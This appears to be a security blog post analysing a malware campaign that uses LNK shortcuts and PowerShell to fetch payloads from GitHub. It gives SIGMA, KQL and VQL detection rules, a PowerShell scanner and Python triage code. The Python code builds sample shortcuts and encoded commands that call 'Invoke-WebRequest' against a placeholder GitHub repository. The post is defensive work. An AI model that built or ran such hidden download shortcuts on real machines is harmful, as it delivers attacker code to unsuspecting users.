Introduction
Defenders face a persistent challenge in identifying malicious activity when attackers abuse trusted platforms. A recent multi-stage malware campaign highlights this risk by leveraging GitHub as a covert command-and-control (C2) channel. By using popular services like GitHub, threat actors can blend in with legitimate developer traffic and bypass traditional network defenses that allow access to these trusted domains. This post analyzes the mechanics of this attack and provides the necessary detection rules and remediation steps to secure your environment.
Technical Analysis
This campaign relies on a chain of obfuscation techniques to establish persistence and communicate with attackers while evading detection.
- Initial Access: The attack vector begins with LNK files (Windows shortcuts). These are often distributed via phishing emails or compressed archives. When a user clicks the LNK file, it does not open a document as expected but instead executes a hidden command.
- Execution and Payload Retrieval: The LNK file triggers a PowerShell command designed to reach out to a specific GitHub repository. GitHub is used here as the C2 infrastructure to host malicious payloads or configuration files.
- Command and Control (C2): Instead of setting up a bespoke server that might be blacklisted, the attackers use GitHub's API or raw content delivery. The malware queries the repository to download encoded scripts or instructions, making the traffic appear as standard web traffic to a trusted domain.
- Persistence and Data Exfiltration: The downloaded PowerShell scripts often include embedded decoders to unpack the final payload. These scripts may also establish persistence by modifying registry keys or scheduled tasks. Furthermore, the malware can exfiltrate stolen data by committing it back to the attacker's GitHub repository.
Because GitHub is a whitelisted service in many organizations, firewalls and proxies often allow this traffic to pass uninspected. This technique abuses the "living off the land" (LotL) principle, utilizing legitimate tools for malicious purposes.
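To triage a suspicious shortcut without launching it, the following Python (an added example, not code from the original post) reads the Shell Link header and StringData fields as laid out in MS-SHLLINK and returns the embedded target path and arguments. The LNK bytes are constructed inline around a placeholder repository URL, and decoding non-Unicode shortcuts as cp1252 is an assumption.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # fixed Shell Link CLSID
HAS_TARGET_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# LinkFlags bits that announce a StringData field, in on-disk order
STRING_FLAGS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon_location")]

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link file without resolving or running it."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                  # fixed-size header ends here
    if flags & HAS_TARGET_IDLIST:               # LinkTargetIDList: 2-byte size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfo: 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, key in STRING_FLAGS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                    # assumption: ANSI shortcuts use cp1252
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields

def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode LNK (no IDList, no LinkInfo) for offline testing."""
    flags = IS_UNICODE | 0x08 | 0x20             # HasRelativePath | HasArguments
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, 3 times, size, icon, show, hotkey, 3 reserved
    def string_data(value):
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)

# Constructed sample: a shortcut that launches PowerShell to fetch a script from a placeholder repository
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"Invoke-WebRequest "
    "https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.ps1\"")
```

Feed `parse_lnk` the bytes of a quarantined shortcut; the `arguments` field is where the hidden PowerShell command line appears.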
Defensive Monitoring
To detect this activity, security teams must monitor for unusual process executions involving PowerShell interacting with GitHub endpoints and the creation of suspicious LNK files in user directories. Below are detection mechanisms for SIGMA, Microsoft Sentinel/Defender (KQL), and Velociraptor (VQL).
SIGMA Rules
---
title: PowerShell Connection to GitHub Raw Content
id: 9e8a5b31-6f4d-4a9c-8b1a-3c5d6e7f8a9b
status: experimental
description: Detects PowerShell processes attempting to download content from raw.githubusercontent.com or api.github.com, which may indicate C2 activity.
references:
  - https://attack.mitre.org/techniques/T1102/002/
author: Security Arsenal
date: 2024/05/23
tags:
  - attack.command_and_control
  - attack.t1102.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'raw.githubusercontent.com'
      - 'api.github.com'
  condition: selection
falsepositives:
  - Legitimate developer scripts or updates
level: medium
---
title: Suspicious LNK File Creation in User Directories
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects the creation of LNK files in common user directories like Downloads or Desktop, a common vector for initial access.
references:
  - https://attack.mitre.org/techniques/T1566/001/
author: Security Arsenal
date: 2024/05/23
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith: '.lnk'
    TargetFilename|contains:
      - '\Downloads\'
      - '\Desktop\'
  condition: selection
falsepositives:
  - User created shortcuts
level: low
KQL Queries
The following KQL queries can be used in Microsoft Sentinel or Microsoft Defender to identify potential malicious activity related to this campaign.
// Detect PowerShell processes connecting to GitHub
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("github.com", "raw.githubusercontent.com")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
// Identify LNK files created in user directories
DeviceFileEvents
| where Timestamp > ago(24h)
| where FileName endswith ".lnk"
| where FolderPath has_any ("Downloads", "Desktop")   // FolderPath is a backslash-separated Windows path, so match the folder name as a term
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessAccountName
| order by Timestamp desc
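The SIGMA and KQL rules above match the GitHub host names literally in the command line, which a launch via -EncodedCommand (Base64 of UTF-16LE) hides. This added Python example, not part of the original post, applies the same image and host-name logic to constructed process-creation records and decodes the encoded command first; the host names, user names and repository URL are placeholders.

```python
import base64
import re

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
GITHUB_HOSTS = ("raw.githubusercontent.com", "api.github.com", "github.com")
# -e / -ec / -en / -enc / -encodedcommand: the common spellings of the Base64 (UTF-16LE) command switch
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def flag_event(event: dict):
    """Apply the SIGMA/KQL logic to one process_creation record, looking inside encoded commands too."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    haystack = (event["CommandLine"] + " " + (decoded or "")).lower()
    hosts = [h for h in GITHUB_HOSTS if h in haystack]
    if not hosts:
        return None
    return {"computer": event["ComputerName"], "user": event["User"], "parent": event["ParentImage"],
            "hosts": hosts, "encoded": decoded is not None, "decoded": decoded}

def scan(events):
    return [finding for finding in map(flag_event, events) if finding]

# Constructed Sysmon-style process_creation records (not real telemetry); the repository URL is a placeholder
STAGE2 = "Invoke-WebRequest https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.ps1"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ComputerName": "WS-0042", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + ENCODED},
    {"ComputerName": "BUILD-01", "User": "CORP\\svc_build", "ParentImage": "C:\\agent\\agent.exe",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -File C:\\agent\\build.ps1"},
    {"ComputerName": "WS-0042", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Git\\cmd\\git.exe",
     "CommandLine": "git.exe fetch https://github.com/EXAMPLE-ORG/tools"},
]
```

Only the first record is flagged: the build agent's pwsh.exe has no GitHub reference and git.exe is not PowerShell, while the encoded launch is caught only because the argument is decoded before matching.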
Velociraptor VQL
Velociraptor can be used to hunt for suspicious LNK files on endpoints and to check running processes for PowerShell command lines that reference GitHub.
-- Hunt for LNK files modified in the last 7 days in user Downloads and Desktop folders
SELECT FullPath, Mtime, Atime, Size
FROM glob(globs=['C:/Users/*/Downloads/*.lnk', 'C:/Users/*/Desktop/*.lnk'])
WHERE Mtime > now() - 7 * 86400
-- List running PowerShell processes whose command line references GitHub (=~ is a case-insensitive regex match)
SELECT Name, CommandLine, CreateTime, Username
FROM pslist()
WHERE Name =~ "^(powershell|pwsh)" AND CommandLine =~ "github"
PowerShell Verification
Use this script to scan for recent LNK files in user directories that might be part of a phishing campaign.
# Only report shortcuts written in the last 7 days
$DateCutoff = (Get-Date).AddDays(-7)
$Paths = @("C:\Users\*\Downloads", "C:\Users\*\Desktop")
foreach ($Path in $Paths) {
    Write-Host "Scanning $Path for recent LNK files..."
    Get-ChildItem -Path $Path -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $DateCutoff } |
        Select-Object FullName, LastWriteTime, Length
}
Remediation
To protect your organization from GitHub-based C2 campaigns and similar threats, implement the following remediation steps:
- Network Segmentation and Filtering: While blocking GitHub entirely may not be feasible for all organizations, implement strict egress filtering. Configure proxies to allow GitHub access only for specific IP ranges or user accounts (e.g., developers) and inspect SSL/TLS traffic to identify suspicious patterns.
- Application Control: Use AppLocker or Windows Defender Application Control (WDAC) to restrict PowerShell execution. Enforce policies that prevent PowerShell from running scripts downloaded from the internet or require all scripts to be digitally signed.
- User Education: Train employees to recognize the signs of phishing. Emphasize that LNK files received via email from unknown senders should never be clicked.
- Disable LNK Files: Consider disabling the default behavior of LNK files in temporary internet folders or forcing them to open in a sandboxed environment.
- Endpoint Detection and Response (EDR): Ensure EDR solutions are deployed and configured to alert on unsigned PowerShell activity and suspicious process injection techniques.